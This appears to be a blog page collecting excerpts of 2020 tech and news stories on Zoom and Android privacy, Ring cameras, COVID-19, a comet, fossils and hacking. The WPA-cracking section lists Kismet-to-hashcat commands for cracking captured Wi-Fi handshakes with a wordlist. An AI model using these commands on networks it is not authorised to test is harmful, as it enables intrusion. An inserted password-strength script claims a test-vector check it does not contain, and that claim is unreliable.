Zoom’s iOS app sent analytics data to Facebook even if you didn’t use Facebook, due to the application’s use of the social network’s Graph API, Vice discovered. The privacy policy stated the software collects profile information when a Facebook account is used to sign into Zoom, though it didn’t say anything about what happens if you don’t use Facebook. Zoom has since corrected its code to not send analytics in these circumstances.

It should go without saying but don’t share your Zoom meeting ID and password in public, such as on social media, as miscreants will spot it, hijack it, and bomb it with garbage. And don’t forget to set a strong password, too. Zoom had to beef up its meeting security after Check Point found a bunch of weaknesses, such as the fact it was easy to guess or brute-force meeting IDs.

Source: Yeah, that Zoom app you’re trusting with work chatter? It lives with ‘vampires feeding on the blood of human data’ • The Register

Android Apps Are Transmitting what other apps you have ever installed to marketing people

At this point we’re all familiar with apps of all sorts tracking our every move and sharing that info with pretty much every third party imaginable. But it actually may not be as simple as tracking where you go and what you do in an app: It turns out that these apps might be dropping details about the other programs you’ve installed on your phone, too.

This news comes courtesy of a new paper out from a team of European researchers who found that some of the most popular apps in the Google Play store were bundled with certain bits of software that pull details of any apps that were ever downloaded onto a person’s phone.

Before you immediately chuck your Android device out the window in some combination of fear and disgust, we need to clarify a few things. First, these bits of software—called IAMs, or “installed application methods”—have some decent uses. A photography app might need to check the surrounding environment to make sure you have a camera installed somewhere on your phone. If another app immediately glitches out in the presence of an on-phone camera, knowing the environment—and the reason for that glitch—can help a developer know which part of his app to tinker with to keep that from happening in the future.

Because these IAM-specific calls are technically for debugging purposes, they generally don’t need to secure permissions the same way an app usually would when, say, asking for your location. Android devices have actually gotten better about clamping down on that form of invasive tracking after struggling with it for years, with Google recently announcing that Android 11 will formally require devs to apply for location permission access before Google grants it.

But at the same time, surveying the apps on a given phone can go the invasive route very easily: The apps we download can tip developers off about our incomes, our sexualities, and some of our deepest fears.

The research team found that, of the roughly 4,200 commercial apps it surveyed making these IAM calls, almost half were strictly grabbing details on the surrounding apps. For context, most other calls—which were for monitoring details about the app like available updates, or the current app version—together made up less than one percent of all calls they observed.

There are a few reasons for the prevalence of this errant app-sniffing behavior, but for the most part it boils down to one thing: money. A lot of these IAMs come from apps that are on-boarding software from adtech companies offering developers an easy way to make quick cash off their free product. That’s probably why the lion’s share—more than 83%—of these calls were being made on behalf of third-party code that the dev onboarded for their commercially available app, rather than code that was baked into that app by design.

And for the most part, these third parties are—as you might have suspected—companies that specialize in targeted advertising. Looking over the top 20 libraries that pull some kind of data via IAMs, some of the top contenders, like ironSource or AppNext, are in the business of getting the right ads in front of the right player at the right time, offering the developer the right price for their effort.

And because app developers—like most people in the publishing space—are often hard-up for cash, they’ll onboard these money-making tools without asking how they make that money in the first place. This kind of daisy-chaining is the same reason we see trackers of every shape and size running across every site in the modern ecosystem, at times without the people actually behind the site having any idea.

Source: Android Apps May Be Snooping on You More Than You Realize

Cheap high-frequency, high-power and nanoscale semiconductors that can see through walls

Scientists have crafted a tiny flexible electrical device capable of generating terahertz waves that can penetrate walls and microscopic cells, potentially paving the way for new imaging techniques – and fast switching in chips.

Terahertz radiation lies in the electromagnetic spectrum where microwaves and infrared meet. These so-called T-waves, ranging from 0.3 to 3THz according to the ITU, have interesting properties: they can travel through clothing, wood, walls, and even human skin, for one thing.

However, they can be tricky to produce, depending on the application, as you often need expensive and clunky equipment. Now, a team of researchers led by the École polytechnique fédérale de Lausanne (EPFL) in Switzerland believe they’ve created something that not only emits high-power terahertz radiation but is both compact and cheap. Which is useful for miniaturization and productization.

The gizmo detailed in a paper published in Nature this week works by producing so-called nanoplasma.

Here’s how it works: two tiny metal plates are placed 20 nanometres apart and a voltage is applied. Electrons migrate towards one of the plates to create a nanoplasma. When enough negative charge has accumulated and the voltage across the plates reaches a critical threshold, the electrons instantly flock to the other plate.

“The very high electric field in the small volume of the nanoplasma leads to ultrafast electron transfer, resulting in extremely short time responses,” the paper explained. This back and forth motion of the electrons on each plate continues, and the device emits a high-intensity pulse of terahertz waves.

“We achieved an ultrafast switching speed, higher than 10 volts per picosecond (10⁻¹² s), which is about two orders of magnitude larger than that of field-effect transistors and more than ten times faster than that of conventional electronic switches,” the academics said.

The tiny nanoplasma devices were fabricated on bits of Kapton tape pasted onto a sapphire substrate, where a thin layer of gold or tungsten was stacked on top of titanium.

“High-frequency semiconductor devices are nanoscale in size,” said Elison Matioli, co-author of the study and an electrical engineering professor at EPFL.

“They can only cope with a few volts before breaking out. High-power devices, meanwhile, are too big and slow to generate terahertz waves. Our solution was to revisit the old field of plasma with state-of-the-art nanoscale fabrication techniques to propose a new device to get around those constraints.”

“High-frequency, high-power and nanoscale aren’t terms you’d normally hear in the same sentence,” he added.

The fast switching speeds could help deliver ultrafast chips that could be used in wireless communication, sensors, or even biomedical imaging.

Source: Want to see through walls? Electroboffins build tiny chip in the lab that vibrates at just the right frequency to do it • The Register

LA Teen Who Died of Covid-19 Was Denied Treatment Because He Didn’t Have Health Insurance. The US looks like a banana republic.

A 17-year-old boy in Los Angeles County who became the first teen believed to have died from complications with covid-19 in the U.S. was denied treatment at an urgent care clinic because he didn’t have health insurance, according to R. Rex Parris, the mayor of Lancaster, California. Roughly 27.5 million Americans—8.5 percent of the population—don’t have health insurance based on the latest government figures.

“He didn’t have insurance, so they did not treat him,” Parris said in a video posted to YouTube. The staff at the urgent care facility told the teen to try the emergency room at Antelope Valley (AV) Hospital, a public hospital in the area, according to the mayor.

“En route to AV Hospital, he went into cardiac arrest, when he got to AV hospital they were able to revive him and keep him alive for about six hours,” Parris said. “But by the time he got there, it was too late.”

The name of the urgent care clinic that refused to treat the teen has not been released. Mayor Parris explained in his YouTube video that the 17-year-old is believed to have had no underlying conditions that may have contributed to his death.

“He had been sick for a few days, he had no previous health conditions. On the Friday before he died, he was healthy, he was socializing with his friends,” the mayor explained.

Source: Teen Who Died of Covid-19 Was Denied Treatment Because He Didn’t Have Health Insurance

Singapore Government to make its contact-tracing app freely available to developers worldwide

SINGAPORE – In a move to help the international community combat the coronavirus pandemic, the Government will be making the software for its contact-tracing application TraceTogether, which has already been installed by more than 620,000 people, freely available to developers around the world.

In a Facebook post on Monday (March 23), Minister-in-charge of the Smart Nation Initiative Vivian Balakrishnan said that the app, developed by the Government Technology Agency (GovTech) and the Ministry of Health, will be open-sourced.

This means that the software’s source code will be made freely available and may be redistributed and modified.

“We believe that making our code available to the world will enhance trust and collaboration in dealing with a global threat that does not respect boundaries, political systems or economies,” said Dr Balakrishnan, who is also Foreign Minister.

“Together, we can make our world safer for everyone.”

Launched last Friday, the TraceTogether app can identify people who have been within 2m of coronavirus patients for at least 30 minutes, using wireless Bluetooth technology. Its developers say the app is useful when those infected cannot recall whom they had been in close proximity with for an extended duration.

For the app to start tracing, the Bluetooth setting on mobile phones has to be turned on.

If a user gets infected, the authorities will be able to quickly find out the other users he has been in close contact with, allowing for easier identification of potential cases and helping curb the spread of the virus.

Official contact tracers will provide a code that users can match with a corresponding verification code on their app. Once authenticated, users will get a PIN that allows data to be submitted.

Contact tracers will not ask for any personal financial details or request that money be transferred over the phone.

In his post on Monday, Dr Balakrishnan said that the GovTech team was working “around the clock” to finalise documents to allow others to use the BlueTrace protocol – the building blocks of the TraceTogether app. He added that TraceTogether has been installed by more than 620,000 users so far.

Dr Janil Puthucheary, Minister-in-charge of GovTech, also weighed in on the app in a radio show on Monday, saying that a team of about 40 engineers spent more than 10,000 man-hours developing TraceTogether.

Dr Janil also encouraged more people to download TraceTogether as added protection.

TraceTogether’s developers uploaded a manifesto for BlueTrace on the app’s website on Monday, calling for international adoption of contact-tracing solutions in today’s globalised world as weapons to turn the tide against the Covid-19 outbreak.

“Covid-19 and other novel viruses do not respect national boundaries. Neither should humanity’s response. In a globalised world, with high volumes of international travel, any decentralised contact-tracing solution will need mass adoption to maximise network effects,” stated the app developers’ manifesto.

Interested parties can contact the TraceTogether team via e-mail or check this website for more information.

Source: Coronavirus: S’pore Government to make its contact-tracing app freely available to developers worldwide, Singapore News & Top Stories – The Straits Times

WPA Cracking from Kismet sensors

During a recent event I decided to set up a passive monitoring station to check for any attempts to impersonate, hijack, or deny service to our WiFi. For this task I decided to use an Alpha card and Kismet (which comes already installed on Kali Linux) to deploy wireless intrusion detection (WIDS).

Kismet worked as advertised and I was able to monitor channel utilization and watch for wireless anomalies (think Pwnagotchi or Hak5 Pineapple).

Channel Utilization Monitoring

Kismet WIDS alerting

This worked great, but I soon noticed that Kismet was also logging WPA handshakes for client connections, which made me wonder: could Kismet be used as an attack platform?

Captured WPA key exchange

After some quick googling I found that it is indeed very possible using this 3-step process.

  1. Export PCAP data out of the Kismet session database (by default stored at the root of a user home dir) by issuing the command kismet_log_to_pcap --in foo.kismet --out foo.pcap
  2. Convert that PCAP into something consumable by hashcat by issuing the command cap2hccapx.bin foo.pcap foo.hccapx
  3. Set up hashcat to crack the stored key exchanges by using the command hashcat64.exe -m 2500 foo.hccapx rockyou.txt -r rules/rockyou-30000.rule

What was surprising was that it took seconds or less to crack many of the captured sessions. What’s more interesting is that it’s possible to deploy Kismet on extremely cheap hardware such as a Raspberry Pi and form fleets of sensors that all log to a central point, where everything is cracked and monitored.

hashcat output

Today’s key takeaway? If you use a portable access point such as your phone as a hotspot you still need to use an extremely long and complex password. It used to take an exorbitant amount of time to crack WPA2, but that is no longer true. Modern techniques for cracking the pairwise master key have been developed which, combined with GPU-based password cracking, mean weak passwords can often be cracked instantly.
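To make that takeaway concrete, here is an added example (not code from the original post) that derives the WPA2-PSK pairwise master key the way the 802.11i standard specifies (PBKDF2-HMAC-SHA1, 4096 rounds, SSID as salt) and estimates how a hotspot passphrase would hold up against an offline search of a captured handshake. The guess rate, the small wordlist and the SSID are constructed assumptions, not figures from the page.

```python
import hashlib
import math
import string

# IEEE 802.11i derives the WPA2-PSK pairwise master key (PMK) from the
# passphrase with PBKDF2-HMAC-SHA1: 4096 iterations, SSID as salt, 32 bytes.
# SHA1 yields 20 bytes, so PBKDF2 runs two blocks and every passphrase
# guess costs roughly 8192 HMAC-SHA1 operations. That fixed cost is all
# that stands between a captured handshake and a weak passphrase.
PBKDF2_ITERATIONS = 4096
PMK_LEN = 32

# Constructed sample wordlist standing in for a large list such as rockyou.txt.
COMMON_PASSPHRASES = {"password", "12345678", "qwertyui", "iloveyou", "letmein1"}

# ASSUMED guess rate for a single GPU rig; measure your own hardware instead.
ASSUMED_GUESSES_PER_SECOND = 1_000_000


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the PMK exactly as wpa_passphrase/hostapd do for WPA2-PSK."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA2 passphrase must be 8 to 63 characters long")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)


def charset_size(passphrase: str) -> int:
    """Size of the union of standard character pools the passphrase draws from.

    Characters outside the four standard pools (e.g. spaces) each add one.
    """
    pools = (string.ascii_lowercase, string.ascii_uppercase,
             string.digits, string.punctuation)
    size = sum(len(p) for p in pools if any(c in p for c in passphrase))
    others = {c for c in passphrase if not any(c in p for p in pools)}
    return size + len(others)


def keyspace_bits(passphrase: str) -> float:
    """Upper bound on search-space size for a brute-force (not wordlist) search."""
    return len(passphrase) * math.log2(charset_size(passphrase))


def seconds_to_exhaust(passphrase: str, guesses_per_second: float) -> float:
    """Worst-case time to enumerate the whole keyspace at the given guess rate."""
    return 2 ** keyspace_bits(passphrase) / guesses_per_second


def assess(passphrase: str, ssid: str,
           guesses_per_second: float = ASSUMED_GUESSES_PER_SECOND) -> dict:
    """Describe how a captured handshake protected by this PSK would fare."""
    pmk = derive_pmk(passphrase, ssid)
    bits = keyspace_bits(passphrase)
    secs = seconds_to_exhaust(passphrase, guesses_per_second)
    in_list = passphrase.lower() in COMMON_PASSPHRASES
    # Threshold chosen for this example: below 64 bits a patient GPU fleet
    # can enumerate the space; a wordlist hit falls in seconds regardless.
    weak = in_list or bits < 64
    return {"pmk_hex": pmk.hex(), "keyspace_bits": round(bits, 1),
            "years_to_exhaust": secs / (365 * 86400),
            "in_wordlist": in_list, "weak": weak}


if __name__ == "__main__":
    for pp in ("password", "Tr0ub4dor&3", "correct horse battery staple xkcd"):
        r = assess(pp, ssid="MyPhoneHotspot")  # constructed SSID
        print(f"{pp!r}: {r['keyspace_bits']} bits, "
              f"{r['years_to_exhaust']:.3g} years, weak={r['weak']}")
```

The PMK derivation is checked against the IEEE 802.11i test vector (passphrase "password", SSID "IEEE"), so the cost model reflects the real key schedule rather than a toy hash.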

To read more about this check out Ins1gn1a’s article titled Understanding WPA/WPA2 Pre-Shared-Key Cracking

Source: WPA Cracking from Kismet sensors – William Reyor – Medium

Ring corporate surveillance doorbells Continues To Insist Its Cameras Reduce Crime, But Crime Data Doesn’t Back Those Claims Up

Despite evidence to the contrary, Amazon’s Ring is still insisting it’s the best thing people can put on their front doors — an IoT camera with PD hookups that will magically reduce crime in their neighborhoods simply by being a mute witness of criminal acts.

Boasting over 1,000 law enforcement partnerships, Ring talks a good game about crime reduction, but its products haven’t proven to be any better than those offered by competitors — cameras that don’t come with law enforcement strings attached.

Last month, Cyrus Farivar undid a bit of Ring’s PR song-and-dance by using public records requests and conversations with law enforcement agencies to show any claim Ring makes about crime reduction probably (and in some cases definitely) can’t be linked to the presence of Ring’s doorbell cameras.

CNET has done the same thing and come to the same conclusion: the deployment of Ring cameras rarely results in any notable change in property crime rates. That runs contrary to the talking points deployed by Dave Limp — Amazon’s hardware chief — who “believes” adding Rings to neighborhoods makes neighborhoods safer. Limp needs to keep hedging.

CNET obtained property-crime statistics from three of Ring’s earliest police partners, examining the monthly theft rates from the 12 months before those partners signed up to work with the company, and the 12 months after the relationships began, and found minimal impact from the technology.

The data shows that crime continued to fluctuate, and analysts said that while many factors affect crime rates, such as demographics, median income and weather, Ring’s technology likely wasn’t one of them.

Worse for Ring — which has used its partnerships with law enforcement agencies to corner the market for doorbell cameras — law enforcement agencies are saying the same thing: Ring isn’t having any measurable impact on crime.

“In 2019, we saw a 6% decrease in property crime,” said Kevin Warych, police patrol commander in Green Bay, Wisconsin, but he noted, “there’s no causation with the Ring partnership.”

[…]

“I can’t put numbers on it specifically, if it works or if it doesn’t reduce crime,” [Aurora PD public information officer Paris] Lewbel said.

But maybe it doesn’t really matter to Ring if law enforcement agencies believe the crime reduction sales pitch. What ultimately matters is that end users might. After all, these cameras are installed on homes, not police departments. As long as potential customers believe crime in their area (or at least their front doorstep) will be reduced by the presence of camera, Ring can continue to increase market share.

But the spin is, at best, inaccurate. Crime rates in cities where Ring has partnered with law enforcement agencies continue to fluctuate. Meanwhile, Ring has fortuitously begun its mass deployment during a time of historically-low crime rates which have dropped steadily for more than 20 years. Hitting the market when things are good and keep getting better makes for pretty good PR, especially when company reps are willing to convert correlation to causation to sell devices.

Source: Ring Continues To Insist Its Cameras Reduce Crime, But Crime Data Doesn’t Back Those Claims Up | Techdirt

Comet ATLAS is Brightening Faster than Expected might be awesome to look at mid May

Comet ATLAS (C/2019 Y4) is plunging toward the sun, and if it doesn’t fly apart it could soon become one of the brightest comets in years.

“Comet ATLAS continues to brighten much faster than expected,” says Karl Battams of the Naval Research Lab in Washington DC. “Some predictions for its peak brightness now border on the absurd.”

Above: Comet ATLAS (C/2019 Y4) photographed on March 6, 2020, by Austrian astrophotographer Michael Jäger. The comet’s diffuse green atmosphere is about twice as wide as the planet Jupiter.

The comet was discovered in December 2019 by the Asteroid Terrestrial-impact Last Alert System (ATLAS) in Hawaii. Astronomers quickly realized it might be special. On May 31, 2020, Comet ATLAS will pass deep inside the orbit of Mercury only 0.25 AU from the sun. If it can survive the blast furnace of solar heating, it could put on a good show.

However, no one expected the show to start this soon. More than 2 months before perihelion (closest approach to the sun), Comet ATLAS is already “heating up.” The worldwide Comet Observation Database shows it jumping from magnitude +17 in early February to +8 in mid-March–a 4000-fold increase in brightness. It could become visible to the naked eye in early April.

“Right now the comet is releasing huge amounts of its frozen volatiles (gases),” says Battams. “That’s why it’s brightening so fast.”

Can ATLAS sustain this crazy pace? If it has a big nucleus with large stores of frozen gas, then yes; we could get a very bright comet. Otherwise, Comet ATLAS might “run out of gas”, crumbling and fading as it approaches the sun.

Current best estimates of the comet’s peak brightness in May range from magnitude +1 to -5. If Comet ATLAS hits the high end of that range, a bit brighter than Venus, it could become visible in broad daylight.

Source: Comet ATLAS is Brightening Faster than Expected | Spaceweather.com

Ancestor of all animals identified in Australian fossils

A team led by UC Riverside geologists has discovered the first ancestor on the family tree that contains most familiar animals today, including humans.

The tiny, wormlike creature, named Ikaria wariootia, is the earliest bilaterian, or organism with a front and back, two symmetrical sides, and openings at either end connected by a gut. The paper is published today in Proceedings of the National Academy of Sciences.

The earliest multicellular organisms, such as sponges and algal mats, had variable shapes. Collectively known as the Ediacaran Biota, this group contains the oldest fossils of complex, multicellular organisms. However, most of these are not directly related to animals around today, including lily pad-shaped creatures known as Dickinsonia that lack basic features of most animals, such as a mouth or gut.

The development of bilateral symmetry was a critical step in the evolution of animal life, giving organisms the ability to move purposefully and a common, yet successful way to organize their bodies. A multitude of animals, from worms to insects to dinosaurs to humans, are organized around this same basic bilaterian body plan.

Evolutionary biologists studying the genetics of modern animals predicted the oldest ancestor of all bilaterians would have been simple and small, with rudimentary sensory organs. Preserving and identifying the fossilized remains of such an animal was thought to be difficult, if not impossible.

A 3D laser scan showing the regular, consistent shape of a cylindrical body with a distinct head and tail and faintly grooved musculature. Credit: Droser Lab/UCR

For 15 years, scientists agreed that fossilized burrows found in 555 million-year-old Ediacaran Period deposits in Nilpena, South Australia, were made by bilaterians. But there was no sign of the creature that made the burrows, leaving scientists with nothing but speculation.

Scott Evans, a recent doctoral graduate from UC Riverside, and Mary Droser, a professor of geology, noticed minuscule, oval impressions near some of these burrows. With funding from a NASA exobiology grant, they used a three-dimensional laser scanner that revealed the regular, consistent shape of a cylindrical body with a distinct head and tail and faintly grooved musculature. The animal ranged between 2-7 millimeters long and about 1-2.5 millimeters wide, with the largest the size and shape of a grain of rice—just the right size to have made the burrows.

“We thought these should have existed during this interval, but always understood they would be difficult to recognize,” Evans said. “Once we had the 3-D scans, we knew that we had made an important discovery.”

The researchers, who include Ian Hughes of UC San Diego and James Gehling of the South Australia Museum, describe Ikaria wariootia, named to acknowledge the original custodians of the land. The genus name comes from Ikara, which means “meeting place” in the Adnyamathanha language. It’s the Adnyamathanha name for a grouping of mountains known in English as Wilpena Pound. The species name comes from Warioota Creek, which runs from the Flinders Ranges to Nilpena Station.

Ikaria wariootia impressions in stone. Credit: Droser Lab/UCR

“Burrows of Ikaria occur lower than anything else. It’s the oldest fossil we get with this type of complexity,” Droser said. “Dickinsonia and other big things were probably evolutionary dead ends. We knew that we also had lots of little things and thought these might have been the early bilaterians that we were looking for.”

In spite of its relatively simple shape, Ikaria was complex compared to other fossils from this period. It burrowed in thin layers of well-oxygenated sand on the ocean floor in search of organic matter, indicating rudimentary sensory abilities. The depth and curvature of Ikaria represent clearly distinct front and rear ends, supporting the directed movement found in the burrows.

The burrows also preserve crosswise, “V”-shaped ridges, suggesting Ikaria moved by contracting muscles across its body like a worm, known as peristaltic locomotion. Evidence of sediment displacement in the burrows and signs the organism fed on buried organic matter reveal Ikaria probably had a mouth, anus, and gut.

“This is what evolutionary biologists predicted,” Droser said. “It’s really exciting that what we have found lines up so neatly with their prediction.”

Source: Ancestor of all animals identified in Australian fossils

Hackers target WHO as cyberattacks double

WHO Chief Information Security Officer Flavio Aggio said the identity of the hackers was unclear and the effort was unsuccessful. But he warned that hacking attempts against the agency and its partners have soared as they battle to contain the coronavirus, which has killed more than 15,000 worldwide.

The attempted break-in at the WHO was first flagged to Reuters by Alexander Urbelis, a cybersecurity expert and attorney with the New York-based Blackstone Law Group, which tracks suspicious internet domain registration activity.

Urbelis said he picked up on the activity around March 13, when a group of hackers he’d been following activated a malicious site mimicking the WHO’s internal email system.

“I realized quite quickly that this was a live attack on the World Health Organization in the midst of a pandemic,” he said.

Urbelis said he didn’t know who was responsible, but two other sources briefed on the matter said they suspected an advanced group of hackers known as DarkHotel, which has been conducting cyber-espionage operations since at least 2007.

Messages sent to email addresses maintained by the hackers went unreturned.

When asked by Reuters about the incident, the WHO’s Aggio confirmed that the site spotted by Urbelis had been used in an attempt to steal passwords from multiple agency staffers.

“There has been a big increase in targeting of the WHO and other cybersecurity incidents,” Aggio said in a telephone interview. “There are no hard numbers, but such compromise attempts against us and the use of (WHO) impersonations to target others have more than doubled.”

The WHO published an alert last month – available here – warning that hackers are posing as the agency to steal money and sensitive information from the public.

And government officials in the United States, Britain and elsewhere have issued cybersecurity warnings about the dangers of a newly remote workforce as people disperse to their homes to work and study because of the coronavirus pandemic.

The motives in the case identified by Reuters aren’t clear. United Nations agencies, the WHO among them, are regularly targeted by digital espionage campaigns and Aggio said he did not know who precisely at the organization the hackers had in their sights.

Cybersecurity firms including Romania’s Bitdefender and Moscow-based Kaspersky said they have traced many of DarkHotel’s operations to East Asia – an area that has been particularly affected by the coronavirus. Specific targets have included government employees and business executives in places such as China, North Korea, Japan, and the United States.

Source: Exclusive: Elite hackers target WHO as coronavirus cyberattacks spike – Reuters

New York Stock Exchange Chairman Sold Millions in Stock Before Crash, after his wife had been secretly briefed about Covid-19

Jeffrey Sprecher, the chairman of the New York Stock Exchange, sold $3.5 million in stock on February 26, a month after his wife, Senator Kelly Loeffler of Georgia, received a closed-door briefing about the covid-19 threat. According to SEC filings, Sprecher sold $15.3 million more in stock on March 11, at the beginning of the crash that has seen trillions of dollars wiped from the financial markets. Both stock sales were of Intercontinental Exchange (known as ICE), the company that owns the NYSE, and of which Sprecher just happens to be CEO.

The revelations about Sprecher come from a new report by CBS News, which examined filings with the Securities and Exchange Commission (SEC). Loeffler’s own stock sales recently made headlines after it was revealed that she sold millions in stock the same day she received a closed-door January 26 briefing on the potential impact of the covid-19 pandemic. Loeffler denies having any knowledge of the sales done in her name.

What makes Sprecher’s stock sales a scandal? For one, they should have been reported as part of Loeffler’s financial disclosures, but were not. Senators have been required to give periodic financial disclosures since 2012 and those filings include any sales and purchases made by the politician’s spouse.

[…]

his wife had secret information about a global pandemic and both of them unloaded while she kept publicly saying everything was fine and dandy.

In fact, this was the video Loeffler posted to Twitter on March 10, the day before her husband unloaded $15.3 million worth of stock in his own company.

Sprecher and Loeffler are reportedly worth at least $500 million. Capitalism may be on its last legs during the covid-19 pandemic, but you can bet that millionaires and billionaires will do everything they can to keep it afloat. Even if a few million people have to die.

Source: New York Stock Exchange Chairman Sold Millions in Stock Before Crash

Hacker selling data of 538 million Weibo users

The personal details of more than 538 million users of Chinese social network Weibo are currently available for sale online, according to ads seen by ZDNet and corroborating reports from Chinese media.

In ads posted on the dark web and other places, a hacker claims to have breached Weibo in mid-2019 and obtained a dump of the company’s user database.

The database allegedly contains the details for 538 million Weibo users. Personal details include the likes of real names, site usernames, gender, location, and — for 172 million users — phone numbers.

Passwords were not included, which explains why the hacker is selling the Weibo data for only ¥1,799 ($250).

Source: Hacker selling data of 538 million Weibo users | ZDNet